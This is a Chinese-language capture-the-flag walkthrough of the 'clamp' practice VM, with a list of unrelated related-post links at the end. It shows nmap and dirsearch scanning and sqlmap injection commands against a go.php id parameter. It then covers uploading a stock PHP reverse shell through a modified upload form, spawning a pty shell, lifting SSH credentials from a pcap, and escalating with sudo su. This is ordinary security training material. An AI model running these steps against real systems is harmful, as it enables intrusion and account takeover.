clamp靶机复现

靶机设置

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.143

目录扫描

dirsearch 192.168.112.143

访问浏览器

提示让我们扫描更多的目录

换个更大的字典,扫出来一个 /nt4stopc/ 目录

目录拼接

拼接 /nt4stopc/

发现页面中有很多判断题

对为1,错为0

按顺序判断下来为 0110111001

拼接访问页面

SQL注入

点击网页发现存在id参数

尝试测试sql注入

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 --batch

果然发现存在sql注入

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 --dbs --batch

查看当前数据库

查看tatil表

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 -D tatil --tables --batch

字段内容为 hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php

进行解码 uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

再次拼接

再次拼接

拼接upload.php

发现文件上传点,但是没有提交按钮,自己添加一个

添加成功

getshell

kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

开启监听

上传文件

http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

md5加密后访问文件

提权

生成交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下看见important.pcapng文件,查看他

发现有一个email信息

url解码后得到

email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it. Good work

账号: mkelepce

密码:mklpc-osas112.

登陆成功

sudo -l查看免密操作

发现可以进行任何操作

直接sudo su

提权成功

相关推荐
上海云盾商务经理杨杨4 小时前
2025数字藏品安全保卫战:高防CDN如何成为NFT应用的“隐形护甲”?
安全·网络安全
ALe要立志成为web糕手10 小时前
TCP/IP
安全·web安全·网络安全·渗透测试
李小咖11 小时前
第2章 cmd命令基础:常用基础命令(1)
windows·网络安全·cmd·cmd命令·李小咖
ALe要立志成为web糕手13 小时前
HTTP 与 HTTPS 的区别
网络·安全·web安全·网络安全
Bruce_Liuxiaowei14 小时前
VNC和RPC加固措施
网络·网络协议·网络安全·rpc
爱学习的小牛15 小时前
当 AI 重构审计流程,CISA 认证为何成为破局关键
人工智能·网络安全·cisa·it审计
ALe要立志成为web糕手17 小时前
计算机网络基础
网络·安全·web安全·网络安全
ZY小袁18 小时前
MGRE综合实验
服务器·网络·笔记·网络安全·学习方法·信息与通信·p2p
一口一个橘子1 天前
[ctfshow web入门]web99 in_array的弱比较漏洞
web安全·网络安全·php
波吉爱睡觉1 天前
Redis反弹Shell
redis·web安全·网络安全